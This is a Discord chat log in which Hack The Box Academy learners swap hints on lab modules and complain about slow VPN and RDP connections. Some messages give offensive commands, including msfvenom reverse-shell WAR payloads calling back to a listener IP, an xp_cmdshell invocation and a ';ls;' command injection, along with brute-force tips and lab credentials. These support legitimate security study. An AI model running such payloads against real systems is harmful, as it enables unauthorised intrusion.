#modules
hey guys i need help my academic email's domain is not in htb current list of valid academic domains I want to get an education discount
WINDOWS PRIVILEGE ESCALATION: Windows Privilege Escalation Skills Assessment - Part I
Question:
Find the password for the ldapadmin account somewhere on the system.
I got the NT/Authority cmd but can't find this one. Really getting exhausted
Any help????????
The results I got back...which is none.
nvm , I see I can get ip addresses using the ||fping -asgq 172.16.6.0/24|| method.
Can anyone explain why we change ip value to ;ls; instead of just ls in the web proxy module?
They didn't really explain that syntax at all.
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@jolly jackal
ok thank you man
This server doesnt endorse illegal activities and you can face a ban for it. I recommend deleting your messages and being smarter about admitting to shit.
i was joking
I dont care and neither will mods
ok
i will keep this in my mind from now
; closes off a command in the shell. You're ending the previous command, starting ls and then ending it to truncate potentially the rest of the commands. It's similar reasoning behind doing SQLi and starting with union and ending by commenting out the rest
Found these files but no password here for ldapadmin

I haven't done this module, but have you tried -hidden?
can anyone help me i stuck in the starting
Utilizing Google and search features will help you.
If you've never touched a linux device in your life: diving into hacking is gonna be an uphill fight vs things that are considered "fundamental" and assumed knowledge
hm
but i cannot open another instance
i have to wait for the tomorrow
Yes: free users get one spawn of the in-browser vm per day
can you help me with it
Can't walk you through something if you can't view/see it
can you show me how it is done
No
do u have any video of it
This field is full of independent research
Learning how to be self-reliant on your own research is important
Google is a very powerful search tool
but that one instance per day is getting me
if you totally new check this
do u have any video of it
Utilize Google
what should i check
ok
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I don't believe in holding hands through a problem
not even me
No
i search about base terminal in brave but it shows ubuntu for some reason
I dont know you, nor do I have any personal investment in you
Most linux distributions terminal is a universal term
i said i also believe in not holding hands through a problem
It, generally, refers to the command line environment in linux
hmm
@jolly jackal the linux introduction will help a lot
ok
thanks for your help :D
download VMware/Virtual box
download parrot ISO
then its just standard install
Bashcrawl is a good little game to learn basic commands
hmm
Parrot Security website
It even gives you a starting point for the commands
nice
gotta give it a try
first i gotta need to download vm and parrot os
btw can i use other linux os for this ?
There's a "setting up" module
if a was where you are I will first do this
You can use any OS you choose
then this
great
hmm
Parrot just has a bunch of repositories [repos] related to offensive security tooling
(thats what pwnbox runs - with a few tweaks)
ok so i am gonna prefer it
hm
it's been mostly reliable for me ¯_(ツ)_/¯
ok
Like any OS there's quirks
But you can easily overcome or bypass with the application of grey matter
Lot of stuff pre-installed aswell
ok
If you use another OS i.e. ubuntu, you'll need to install tools manually
which is good or bad depending on what your doing
so parrot will be the best
But parrot has everything you need for acad
no arch is the best , JK
it's mostly good for its intended purpose ¯_(ツ)_/¯
i think kali linux might also have the same thing
The main reason parrot is pushed is bc they are partnered with htb
my friend use linux and he told me that it is also good for this things
ohhh
Kali is too bloated for me, too many default programs that I'll never use at startup
hmm
they basically do the same shit , just preference matter
^
Some people have shitty experiences with parrot and switch to Kali, and vice versa
at the end is not abt which distro you use , it's about ur skills
hm
BRB hacking nasa with a firestick
hahahahahah
hey i am download parrot os and there is three option
iso
virtualbox
utm
Iso
ok
Or if you're using virtualbox, the virtualbox option
btw why not virtual box
ok
The virtualbox option is a pre-made one
hmm
i just installed virtualbox
you can use virtual box , or use the iso and setup it yourself
Meaning you don't really get to make your own user and such
The iso can be used to install in vbox
it's the easiest way
ok
There's documentation on the parrot website on how to install
ok
bro tf parrot virtual box is 6.9gb
We don't 🗿
hhhh it's a whole OS so ...
Yes because it's mostly pre-configured for quick start
man i do not have any wifi
gotta need to ask for someone's pass
It contains some settings and such for it to be imported into vbox
hmm
i didn't understand what u said
The virtualbox download is a .ova file for virtualbox to import. .ova files are vm files that contain the whole OS and related VirtualBox settings for minimal setup
the Parrot instance on active directory freezes over SSH every 5 mins
like I swear why would I need to ssh to do stuff with the windows instance?
In some instances rdp is disabled or a user you gain access to doesn't have remote desktop privs
(They may have remote management privs though through rm/ssh)

also the lag is over ~800 or 1000ms from SEA to EU
fucking hell there is no academy server in SEA
At least not currently
There's a pwnbox server there, so maybe they'll expand the vpn servers for academy there
maybe uploading mosh-server into the instance gives me some local echo but with no scrollback
so maybe I would need to dump the output by redirecting stdout into a text file
if i purchase student sub, do i get cubes for completing the tier 1-2 modules
Yes
Hi buddy's
can an1 help with installing kali linux
its saying inaccessible i can't even start it and its caused by a machinwrap apparently if an1 can help lmk
whose idea was it to hide the damn Windows VM behind another SSH linux machine?
idk
am the only one who face rdp problems ?
if in pwnbox----> server issue
if in kali or personal VM download openVPN config. file with TCP NOT UDP
in VM it's weird It was working one hour before
It happens..
Even after switching to TCP is same thing happens I shut down it, come back after 1 hour or 30 mins so...
any hint?
quick google it for the error tells me that there's problem on the lab (Some ssl error ) , it works with rdesktop but very slow
Have you reached out to support?
no the problem from the labs , found ppl got the same error in the same section
maybe because the windows version is too old
Ah, okay
I still suggest reaching out to support if you run into issues but I'll pass along that the module is causing issues
thanks but i don't think it's worth it
I understand, from our side it helps us understand where the issues are.
Can I get the RDP output screenshot?
Were you on TCP or the UDP VPN?
I tried with both , the same
Same on other VPN servers?
tried on eu 1 and 2
I don't remember having problems with that but yeah it's windows server 2008
It's a known issue now, it's something we're still looking into what's causing it
yeah ppl got the same issue https://forum.hackthebox.com/t/windows-server-issue-with-rdp-connection/267091/2 , but what do you expect from windows server 2008 ?
ssh is borderline unusable for me unless I upload mosh-server into the server but I would lose scrollback
Same module section?
yeah
Kk, thank you
like the damn vuln AD machine got locked behind another fucking parrot vm
every 5 sec it freezes and like a mins later the server would send the echo back
have you reached out to support?
wait there's ssh in this section ?
aaah you mislead her
What is the issue with SSH?
borderline unusable
the delay is insane even with a 1gbps internet (my uni's)
I need more detail. Slow in response or what you type in
Please reach out to support and don't turn this channel into troubleshooting vpn connectivity issues
yeah alright
very slow response
Need to speak to a person? Learn how to reach our support via HTB Labs.
I'll reach out there
@limber river
xfreerdp /v:10.129.32.4 /u:htb-student /p:HTB_@cademy_stdnt! /tls-seclevel:0 /timeout:80000
tysm it works , great troubleshooting skills 
Hi, wanted to ask how much time it takes to complete the Penetration Tester learning path
from 1 week to 1 year lol
it really depends on ur lvl , how much time you dedicate for it , so no one can answer
How much do you reckon it would take if I were to do it 21 hours a week
depends on your level
There’s no definite answer; but average is ~3 -6 months
Hmm alright, thanks!
How much time did it take you?
I’m not done with the path yet.
all I can tell you , it's great content
Ah okay, thanks a lot you guys!!
Tbh you should just do it at yo own pace.
Hello, can someone give me hints for Intro to whitebox pentesting skills assessment? I have located a possible injection point, but I just can't get a working payload. You can DM me, and I can provide more information.
need help on https://academy.hackthebox.com/module/67/section/912 , can exploit the ||ms10_092_schelevato|| even with process of x64
I respawn the lab still the same problem
I have a question regarding host from offshore lab, is this the right channel to post the question? i am new to discord channel of HTB.
Hard to do any modules when the spawn machine is unstable 
the windows labs , specially with rdp are too slow
Has anyone completed the Attacking Authentication Mechanisms yet? Currently stuck on OAuth brute forcing weak access tokens. Found many ||tokens|| but can't move forward.
edit: solved
Hello, I have some issues with the labs. They are slow, and even resetting the target/ changing the VPN doesn't change anything. Does anyone have a fix ?
They are!
There is no fix, unfortunately. The only thing you can do is try to change VPN
i am stuck at somethin
WINDOWS EVENT LOGS & FINDING EVIL
Tapping Into ETW
i turn silketw on and then start seatbelt after this i check the etw.json file and it just gives me a billion ProviderGuid with no ManagedInteropMethodName at all
did you let silketw running while you ran seatbelt?
I want to add my progress in the academy on my CV.
i create a student id in the settings.
But how do i add it?
It is only HTB-xxxxxxxxxx not a link. There stand something over an api where i can find the api
you can get a transcript in your account settings, that's about it
i know but there are as second option the student id
imo if the employer doesn't know about htba, they aren't gonna care. if they know about it, providing the transcript is easy enough 
it's like the top 1% thm thing, no one really cares about it
you need a unique token to view the information so I guess an org has to request one or something
what the hell even is this
[06:14:02:752] [9892:9893] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[06:14:02:752] [9892:9893] [WARN][com.freerdp.crypto] - CN = MS01.INLANEFREIGHT.LOCAL
[06:14:13:080] [9892:9893] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[06:14:13:082] [9892:9892] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
i have a user that can rdp i cant rdp
-_-
12 packets transmitted, 9 received, 25% packet loss, time 11764ms 😄
o ok
I give up I can't study like this, probably going to wait today
on tcp on eu 1
Active Directory (AD) is the leading enterprise domain management suite, providing identity and access management, centralized domain administration, authentication, and much more. Due to the many features and complexity of AD, it presents a large attack surface that is difficult to secure properly. To be successful as infosec professionals, we ...
99.79% done
yesh
Hey there,
Does anyone know how I can access the module finished page that comes up, once I finish a module? It has some interesting information which I would like to access at any time and not just once after I finished a module.
The URL is https://academy.hackthebox.com/module/finish but only works dynamically.
Pull the module up, go to the last page in the module, and then click finished at the bottom. That will take you back to the module completed page.
Stupid me. Could have checked that as well. Thanks for running those miles for me. From the UX, I expected the finished page to pop up, once I finish a module, because it also features a "retake module" button.
I don't think you're stupid dude. I ran into the same issue when I first started the course, and thats the only way I've seen to get back to that completion page. I try to go back and do the suggested boxes for more practice when I get tired of going through modules.
yea, that's what I wanted it for also.
Im in the RDP and SOCKS tunneling with SocksOverRDP section of the pivoting and tunneling module. The issue im having is that the last ip im supposed to get to, 172.16.6.155 (jason:WellConnected123!), isnt reachable from the windows host we have access to. Also the host used in the example is reachable but has separate credentials that i dont have.
Also a question to the sqlmap Essentials module. Does anybody have an idea what the injectable query of case7.php?id=1 looks like in the code? I had no problem solving it, but toying around with the vector and the boundaries, it behaves in a way that does not make sense to me. I always try to think about the query and the position of the injection, when I try to find SQL injections. But with this one, I have no freaking clue where in the SELECT statement I am injecting into.
I normally look up the syntax of the query and think about, where the injection point might be. For this I take the syntax e.g. for MySQL from https://dev.mysql.com/doc/refman/8.0/en/select.html.
they are hard to follow true, specially when the RDP on windows is slow xD
The Penetration Tester Job Role Path is for newcomers to information security who aspire to become professional penetration testers. This path covers core security assessment concepts and provides a deep understanding of the specialized tools, attack tactics, and methodology used during penetration testing. Armed with the necessary theoretical b...
damn
That'll help with the TLS issue
damn htb. Stop making me more nervous here
ye i fixed it with switching from eu 2 to eu 1
Which section and VPN?
VPN is above 😛
F. I'm blind.
So for the ||172.16.6.0/24 subnet from the AD enumeration and attacks assessment and I found 3 internal IP addresses for that subnet:
nmap scanned all 3 internal IP addresses and 2 came back with different services.
I tried logging into one of the internal ip addresses on that subnet with the xfreerdp tool(and initially using the credentials in the module) and it came back with an error.
So I would likely need to find the credentials using the netexec tool and I would likely need to use a mutated password list and username list(like the ones found in the password attacks module??)||
Hey mods just a heads up- the pycrypto package in this bash script (https://academy.hackthebox.com/module/112/section/2117) no longer seems to work with the latest version of python3, looks like it hasn't been updated in at least ten years. If the pycrypto package fails installation the rest of the packages on that line (passlib, python-libnmap)fail installation too and have to be installed individually. However, this(https://pypi.org/project/pycryptodome/) is a fork of that package and seems to be working so far (able to run odat.py -h)
MODULE: ATTACKING COMMON SERVICES
📢 Hey everyone! 👋
I've been on the hunt for the mssqlsvc user in our database since yesterday, but no luck so far. I've gone through the usual spots like sys.database_principals and a few others, but it's like looking for a needle in a haystack. 😅
If anyone has a friendly hint or knows a corner I might not have checked yet, I'd really appreciate the guidance! 🙏 A fresh perspective could be just what I need.
Thanks a bunch in advance! 🌟
This is supposed to be the easy part, yet I can't find any user or any entry that looks like a hash.
What section is that?
SQL Databases (Attacking SQL Databases)
Hi Guys , I am stuck at Password Mutation section , I have created mutated password list from the resources and I tried to Hydra the FTP and Crackmapexec SMB with no luck , The Vm just terminates , Can anybody shed some light? Thanks
What is the question? Are you finding a user /password ?
What is the password for the "mssqlsvc" user?
i am enumerating since yesterday, but i cant find shit... i mean it cant be that hard, i missing something obvious
Try targeting ssh
Tried ssh brute but it was even slower
Did you try all the commands in the section ?
Yeah it takes a long time but you’ll eventually find it xd
there are like 3 or 4 databases where i have access as the current logged in user. but i cant find anything in there...
i tried the commands yes.
There was an attack shown in the section that lets you capture the ntlm hash.
doesn't ftp work? or is it a different section
I think it might be a different section.
I’m pretty sure it’ll be ssh and smb.
Tried FTP as well
It has FTP , SMB & SSH
If there’s ftp, then @next bronze may be right.
I did get mine through ssh tho. But it took forever.
Did you use Hydra or Crackmap?
just to make sure, how many lines in your mutated password file?
^
holy shit i got it
Hydra, CME doesn’t support ssh
please give me a gun to shoot myself.... what the hell i should read the modules instead of freestyling it
94,044 lines
It happens sometimes.
Just have to try everything 
Did you manipulate the Thread # ?
ssh can't handle too many threads, the default is 4
yup, Same as rdp.
So I have read only to id_rsa. I run VIM on it - how do I save the file directly to my machine?
i feel so dumb but now I can move forward and make the same mistakes the next time 😉
just copy the content and save it on your attack machine.
Hi , I am doing the final engagement of the "shells&payloads" module, attacking the 1st target now.
msfvenom -p java/shell_reverse_tcp lhost=172.16.1.5 lport=1234 -f war -o shell.war
172.16.1.5 is the IP address of my foothold machine
I deployed the webshell and tried to access it, but got HTTP 500 error, anyone knows the reason?
did you set up a listener?
yes
any tips to deal with the sluggishness that is the AD module? spend more time to input any command than actually running anything
using netcat, I am following this article https://null-byte.wonderhowto.com/how-to/hack-apache-tomcat-via-malicious-war-file-upload-0202593/
try changing vpn servers.
using the pwnbox
then server location maybe
already using the closest to me now, everything in the pwnbox is fine, really just from there to the target. even ssh is really slow
you are on the right track with the IP/ lhost
ok, thanks
you should try a different payload specifically jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xx.xx.xx.x LPORT=xx -f war -o revshell.war
that should work
Thanks for the help with VIM, finally got root. Turns out I was messing up the copy and paste with VIM somehow
Hmm, I tried the payload with MSF directly and it says it's not a compatible payload for exploit(multi/http/tomcat_mgr_upload)
no, just use multi handler to catch the shell or just use nc
ok
thanks, got the shell!
glad to help
when I list the payloads of exploit(multi/http/tomcat_mgr_upload) , I did see "java/jsp_shell_reverse_tcp", not sure why it then said it's not compatible...
I think you needed to use show targets option but I am not sure
Not going to lie.. this academy course is so good
only one target,
Exploit target:
Id Name
0 Java UniversalExploit target:
yeah i thought so.. I had a similar problem rooting a box some time ago, I had to manually upload the .war file
yeah, manual upload works
but how do you know we have to use the JSP one? you tried one by one?
Anyone have a few minutes and familiar with the File Uploads assessment? Long story short, trying to get upload.php and successfully injected my SVG code, output is huge, but there are extra characters it, so base 64 decoding it is proving to be a challenge, just need to know what portions of my received output I have to decode
Apache Tomcat is used for deploying Java-based web applications, including those built with JSP.
so when the intial payload wasnt working I had to look for a JSP one.
👍
cut right after "base64," to the end?
Actually it's just kicking back my image Im using to hide my SVG, I'm having a tougher time with this one than I did on DNS lol
Hi
Does anyone know why it is taking a millennium to load anything within zap
Hi, I'm working through the "Introduction to deserialization" module Page 7 (tools of the trade). The challenge says " Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq". I have a reverse shell but I actually don't have a clue what it's wanting. Either I'm being a complete dumb dumb or the question isn't very clear at all. Don't suppose anyone is able to advise?
Nevermind... just a skill issue
a general question
if I know a module exists in MSF, like "/usr/share/metasploit-framework/modules/exploits/123456.rb"
but I cannot find the module with "search" command, is there a way that I can specify the module with the absolute path in MSFConsole?
Question about the File Transfer module of CPTS
For the linux file transfer, it is advised that we run
sudo python3 -m pip install --user uploadserver
While I understand they want this module to be ran as root to bind to the 443 port, hence the root install, is it a good-enough reason to advise pip to be ran as root?
At the end of the day, we could install the package as a non-root user and bind to port 4444 for example.
Am I missing something?
You can generally just specify use exploit
I tried "use exploit absolute_path", not working
also tried "use absolute_path", it doesn't work either
sudo in this instance of installation is for it to be usable by all users, you can use the uploadserver without root to bind to ports >1024, the first 1024 ports are reserved ports, thus requiring system/root privs
marcie
I meant, Replace 'exploit' with the exploit name, not path
do you know how to turn off the pretty chrome dev tool http request crafter and make it raw?
No
It's likely a button
if the module is already in the database / imported, you can update the database
Thanks Marcie
Any staff able to help?
"Introduction to deserialization" module Page 7 (tools of the trade). The challenge says " Using PHPGGC, obtain RCE on the target and submit the user-id of dnsmasq". Revshell is simple but i'm not sure what the question is actually after?
I believe the module is there by default, maybe I can copy the full module name from the .rb file
I mean... it's fairly clear imo
It's not asking for a revshell btw, just rce
And how would one get the user-id
there is no user "dnsmasq"
Perhaps it's a service
if that's the case then the question could definitely be clearer. Do services have user-ids?
that's what the error means, make sure the path is correct
Yes, www-data is a service and has a uid
this is important, even if the module is there, it's not necessarily loaded, that's why we cannot find certain modules with the "search" command in MSFConsole
reload_all and search solve the issue
ahh that clears it up for me, got it now. Thanks.
I'm currently doing the file transfer module and I cant connect via RDP to the windows machine:
Try single quotes around the pw
Hi guys, need help for Attacking Thick Client Applications in module Attacking common applications => i'm trying to get the creds out of restart-service.exe, however I cant find the DOS MZ executable in the memory map view, so i cant dump it
Hello my dear HTB people.
Got a question on the RDP and SOCKS Tunneling with SocksOverRDP in the Pivoting module.
So: I transferred the .dll, however even when I tried to run it as admin it didn't work.
disable UAC and try to transfer it over again
UAC as in user access control?
Ohh, user account/
Aight, will do.
hey guys! I am new to HTB. I wanna solve the Survival of the Fittest challenge but I'm not getting how to. I started an instance and it gave me the following docker host 83.136.252.214:55914. What am I supposed to do with this? It's a blockchain challenge and I need to interact with the smart contracts.
This article here also didn't prove much help.
@fathom pendant I've restarted the box and tried with ' instead of " in my local terminal without the pwnbox. It worked thx
Wrong room
what's the right one?
i don't have access to this channel 😦
First statement, read #welcome
Malware module is the best one when the RDP is running SLOW xDxD 🤡
Real world incident report how to use my workstation
Hey everyone, I am doing the Live Engagement section of the Shells & Payloads module. In order to continue I have to login to the target machine's tomcat manager. The hint provides the creds to get in, but would I be able to find these creds without using the hint? I've looked through smb shares and found nothing. It's a little cheesy if they force you to look at the hint to get the creds.
Desktop

WOW haha how'd I miss that
I swear this question has been asked like at least a dozen times
You can likely search it in the discord
OK, time for a humblebrag, took me 12 hours and at end, I changed my process entirely, used a different way to upload the file without using Burp which was giving me headaches... I learned my lesson if at first you dont succeed , try a different technique instead of trying again using same processes...
Im on the Intro to Assembly Language Conditional branching and trying to solve this question: "The attached assembly code loops forever. Try to modify (mov rax, 5) to make it not loop. What hex value prevents the loop?" I have stopped the loop but I don't think I understood what hex value is it trying to ask off of me. Need some clarification and guidance on the matter
Any tips as to how long it approximately takes to crack username/pw on Password Attacks Skills Assesment Easy once you pick the correct username/password list?
Same as earlier challs in this module (very quick once correct wordlist is found)?
Based on my experience with those modules less than 10 mins , longer than that and its likely a problem with wordlist. Use the wordlists that are with the module and then use hashcat to mangle them to increase complexity and build a larger wordlist
Could someone help me, I have an exercise from the academy, several people have already confirmed that the answer is correct, but the exercise is not accepting
DM me
plsss stfu
Hi guys I'm stuck in the attacking common application module, in particular on attacking splunk, I followed the lessons, changed the run.ps1 with my ip address but cannot spawn a reverse shell when I upload the tar.gz file... any help?
Hey guys can anyone help me with getting back a full shell in Playing Pong with Socat?
im really stuck and i am getting back a reverse shell over the Pivot host, but the shell is always closing (Problem is solved)
am i the only one facing summoning issues? 🥲
Just drink some mana potions 

Ofc can't forget 
whats that now
i cant keep drinking anything u give
Wisdom
solved
mana didnt work 
that Password Attacks module was so fking boring man
important tho
go away
👍
question
yes
Answer
bro got denied
why am i unable to send images to aid in my question?
Because unverified users can't send images
huh. how do i get verified? i agreed to the rules
YOU REPRESENT NO ONE BUT YOUR SELF
Read #welcome
How does one "shut your fuck up"
stop typing
Personally, with a drink
yk valid
They got muted
Guess they found out how 🤣
English 
I almost did a pre-emptive ping earlier tbh bc I could almost predict it
Also now you'll have access to more of the server
why would I escalate that to a tier 2/3 analyst? I picked "Nothing Suspicious" but was wrong. the way i see it, someone tried to login, it failed, and quit to go get their account fixed or something.
Failed login attempts to a disabled user
That by itself can be suspicious
The keyword being here [disabled]
It's not a lockout, it's a user account that's been disabled
1> EXECUTE('EXEC xp_cmdshell 'dir ''C:\Users\Administrator\Desktop'' /B'';') AT [LOCAL.TEST.LINKED.SRV] ]
2~ go
3~
why dont it work it just nothing popping up
its not frozen
but no command work?
You have an open quote
oh i c how do i cance that cmd
Ctrl-c
hmm. so someone trying to login INTO anni (disabled user) is suspicious? I was reading the log as "Anni tried to log into their account, which was disabled". thats why i was confused
I'm sure you can click on the event to learn more
also how do u kno its open quote and how wud u quote it properly?
After the /B it looks like you have a "
yeah i added IP address to the list and it looks much more suspicious now. thanks
ipv6 looks suspicious ?
No
I have no idea why my ligolo IP is down.
I tried restarting my Virtual box and resetting IP with "sudo ip link set ligolo up " but no luck.
is it a glitch?
bam !
I'm having trouble with snmp. I brute force community strings but when I do that I get this output and I don't see a community string there:
10.129.74.233 [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
This is for SNMP section of footprinting module.
I don't get why I get output but not a community string even when brute force?
can someone help?
“Public”,no?
hold on
ok so what? its not like I can access it from a web browser
You mean why is that important?
right well I mean why is it important that its public if I can't access from web browser? can I do it with nmap?
will nmap get me results I need?
hold on I played with nmap and now its listing various services on it
You can connect to snmp via snmpwalk and other tools
And you can read/write depends on the permissions of the community to the system settings
Web Proxies module, "Try using request repeating to be able to quickly test commands. With that, try looking for the other flag."
As of right now I am looking through the nodes_modules directory, does anyone know if I am on the right track?
I've looked at all the other content within the flag.txt directory to no avail. nodes_modules is the only directory that seems to lead anywhere
but then again I am having trouble accessing the contents within nodes_modules and public
I am trying this and its not working:
┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c [public] Linux NIX02 5.4.0-90-generic #101-Ubuntu SMP Fri Oct 15 20:00:55 UTC 2021 x86_64
NIX02: Unknown Object Identifier (Sub-id not found: (top) -> NIX02)
┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c NIX02 10.129.74.233
Timeout: No Response from 10.129.74.233
will read link you gave emma but I'm wondering if I need to or if I am on right path and getting one minor thing wrong
or if I'm doing everything wrong because I'm missing something
this also hasn't worked:
┌─[us-academy-2]─[10.10.15.167]─[htb-ac-605555@htb-pirblr2j73]─[/usr/share/SecLists/Discovery/SNMP]
└──╼ [★]$ snmpwalk -v2c -c Linux NIX02 10.129.2.26
snmpwalk: Unknown host (NIX02) (Invalid argument)
is anyone able to help?
Im doing hard lab in Password Attacks module, im trying to log-in with Johanna user but im not able to find the pwd, do i have to do boring stuffs like searching the db of previous machine?
no you just need to crack it
The community is just public
Nothing more
maybe im using wrong list, ive tried to generate a mutated one too
-c public
ok thanks
are you using hydra?
cme should be able to crack it
try the mut_password.list wordlists
it should work
i did bro
i just cracked it yesterday using that wordlist and crackmapexec :3
how many lines does your mut password list has?
94044
the password should be there then 100%
blud
just try again with crackmapexec and wait for it lol
anyone have any pointers
i cannot even use multithreads 💀
I am searching through the node_modules directory, am I wasting time or am I on the right track
it won't take more than 10min i guess

Do you have to use the rockyou.txt password list on the kali machine or do you create your own mutated_password list for the AD enumeration and assessment part 1 box
keypass pwd doesnt work omfg
It should ||for the app||
Hey @fathom pendant do you know if I am on the right track for web proxy module burp repeater section
I've been looking through all the content inside the node_modules directory to no avail, I've already looked through the "Public" directory as well to no avail. Am I on the right track ?
Haven't done that one
look in other dirs
maybe you can use the find cmd
Thank you
I was going at it for about 2 and a half hours straight, imma get a snack real quick, and then I’ll update u @lusty thicket
Examine the third target and submit the contents of flag.txt in C:\Users\Administrator\Desktop\ as the answer.
I cant find a user and password by using crackmapexec, evil-winrm, and hydra by using the user and mutated password list given in module. Any tip to navigate me in right direction?
Try other lists, or maybe you need a local-auth flag or something
Can you explain local-auth and other lists?
i cant mount the
||Backup.vhd||
i tried doing it with guestmount as i saw in a blog but it shows the file format is unknown not ntfs
when i transfer the .vhd to my machine through smb it doesn't transfer all contents?
cant you just get *?
i did get
but it doesnt transfer all contents
so when i try to mount the .vhd file i fail
i've been stuck in this hard lab for 2 days rn lol
did you manage to mount the vhd file?
no

isnt it encrypted?
anyone been through this module? Any tips?
how do you know if it encrypted or no?
in theory with file bin, no?
doesnt seem so btw
@crystal steeple
hmmm ngl this is something new to me :3
come pvt i found smth
finally finished the daunting password attacks module
feels like i got the cpts lol
who is down to do a easy machine together?
Hey guys, I need a little help with nmap module
I'm in the firewall evasion section in the academy and I'm trying to run a stealth scan. It wants me to find the OS running on the target, and the hint states that admins in this scenario don't want hosts in the same subnet talking to each other, so naturally I run a scan to find other hosts that I can use to spoof my scan.
However, when I try to run my scan with the -S and -e flags I get an error stating nmap "failed to determine a route to [target]". Am I missing something here?
I know that the decoy IP needs to be alive so I ran a scan for other active hosts on the network, but no matter what IP I use I get the same error. Anyone have experience with stealthy nmap scans can maybe give me some pointers?
You can't spoof scans on a host you don't control
Also spoofing is not required
If I can't spoof, then what would be the next option? A decoy?
I'm assuming the module wants to practice what I've learned but I don't think it's clicking yet
That would explain the error, I guess
you’re over-complicating it
Think dumber
Path Bash Scripting; Module Comparison Operators:
Create an "If-Else" condition in the "For"-Loop that checks if the variable named "var" contains the contents of the variable named "value". Additionally, the variable "var" must contain more than 113,450 characters. If these conditions are met, the script must then print the last 20 characters of the variable "var". Submit these last 20 characters as the answer.
I know i have done something wrong with the first if comparison parameter what else?
👏
how can i know if all my ports are closed?
netstat -ano
then what should i do
what will happen if i close all my ports
hey
so how can i know which port to keep open
and the rest should be closed
you don't really need to manage the ports if it's your personal machine
what are you trying to accomplish
You only really need to worry about ports if they're exposed to the internet.
ports are normally open on your PC
your router is what blocks external access
in the windows PE skillAssessment 1 , is it intended to answer the questions in order ? || I needed system privileges to answer the second question ?||
i did not understood
so do i need to change the rule in which i closed all the port in both inbound and outbound
I just saw a video of ebola man in which he used angryip scanner to get ip and somehow he got a open port of 445 or something like that and then he window shares and he got to see his system files
if you havent opened the port on your router
no one from outside your home network can connect
if you want to completely cut off your internet connection, sure
hmm
Outbound ports are what you use to connect to the internet
i just saw one of my port open
inbound ports is what people use to connect to you
hmmmm
on your pc, or on your router
this
if you haven't messed with the router ports you're gonna be fine
i use mobile hotspot
but for security purpose
i don't want a random guy to check my system files
so what can i do to save myself from this
dont open ports on your router
so how can i close it btw i don't have router


but still in angryip scanner shows that one of my port is open
guys i am new to cyber security and what did u recommend me to excel in it
even tho i closed all the ports in my firewall setting
On your PC? Or on your router?
It doesn't matter
hmm
@acoustic owl
How are you connected to the Internet?
This is a Router
Your PC has an address such as 192.168.x.x, 172.16-32.x.x, 10.x.x.x?
did u know what those x variable are
bro tf how u did it
0-255
Magic 🤪
teach me
I know your ip
it's 127.0.0.1

how did u did that
teach me man
i don't trust this link
then google
ok

bro am getting bullied here just because i don't know hacking
Legacy IP? Eeew
My IP is ::1


This has nothing to do with hacking.
These are network basics
and i don't even know that
teach me that
You a c developer ?
where can i learn is
That's not a problem either. You can learn it if you want
@next bronze can I dm you ?
what are those network basics
based that you referenced an RFC.
hmm i have signed in it
how is referencing an rfc mean you're a c dev
just installing parrot os might take some days
sure but what about
Then the fun really begins. 😃
if it's about that question unfortunately I don't remember
aaah okay
I think I've seen some people say that tho
bro tf i did not saw anything in that link
not sure how I did it, it's close to a year ago now
i only saw motivation
as a heading
that was a long time lol
yeah 
btw which area should i choose for networking
can you tell me i wanna choose the right thing for networking
wdym by the right area for networking , are you talking abt vpn or what ?
that module is specifically the introduction to networking
the basics of it
no like i got to choose some areas
ohh
like secure coding and all those stuff
like the interest but i know nothing about any of those area
you mean areas in hacking ?
like u might have got the same page
while choosing the area of your interest
idk how i got log out from that acc
it's ur first on the platform , they ask about ur interests right ?
ya
which one should i choose
i never heard the area of those name
those questions don't generally matter
hmm
you can not answer them, they don't give you any special access to anything
also a lot of the terms can be googled
THE ONE YOU LIKE MORE
hmm
i have never heard them
google them
hmm
You can also just not answer the question
lol it's not a requirement to answer those questions
you wanna be hacker , google is your friend
thats a cap
not like they know if it's the actual truth ¯_(ツ)_/¯
hey guys i wrote uname -a in parrot terminal
and got something which wrote dynamic
what will the answer of the question
Based on the commands you executed, what is likely to be the operating system flavor of this instance? (case-sensitive)
what does this even mean
read the section and answer it yourself
ok
i have to write the cmd line in the terminal isn't it
also pretty sure you're meant to ssh to a target for this section
what is ssh
a connection protocol

you got a lot to learn
btw the instruction did not told me to do that
is just said write uname -a in base terminal
intro to linux?
marcie did lol
well "linux fundamentals" i should say
ok
but i did not got that
if you're gonna request help in here: you're gonna have to tell us the module and section name
otherwise we can't effectively figure out what you're trying to communicate
it somewhat bridges language barriers if we read the question you're stuck on
Academy modules are broken into sections; each section contains text and usually some questions
the questions will tell you what it wants and generally instruct you to Authenticate in some way/shape/form to a target with given or discovered credentials
if you're on the linux fundamentals module; and on the System Information section - there is a small bit that talks about SSH
it is HIGHLY advised to read the WHOLE section and module before trying to ask questions
as often what you just asked is covered
@jolly jackal try somethin like this
MODULE: ATTACKING COMMON SERVICES
SECTION: RDP
Question: I'm experiencing difficulty connecting to the RDP service using xfreerdp. The connection seems to fail whenever I click on a single file. I've also attempted to use the web-pawn-box as an alternative, but unfortunately, the connection continues to fail. Is this behavior expected, or am I encountering an unusual issue?
this is an unusual issue
btw. this is a legit question hahahah, is it expected behavior that the rdp connection fails? :-DDD
but also it's just pwnbox not pawnbox
just provide link to the section + what you have done
Hi i was quite new here and to all of this but i hope someone could help me with the following problem?
I am trying out the Sequel in Tier 1.
I can ping the ip but nmap isn't returning anything when using nmap -sC -sV {target_ip} it just keeps endlessly running.
I have already tried to reconnect vpn and also reset the box but still no luck.
i disagree with that' i'd rather have the module/section name than just the link - but that's also partially due to how i have my notes written
run the command again and add -v for verbose mode, so you can track what nmap is currently doing
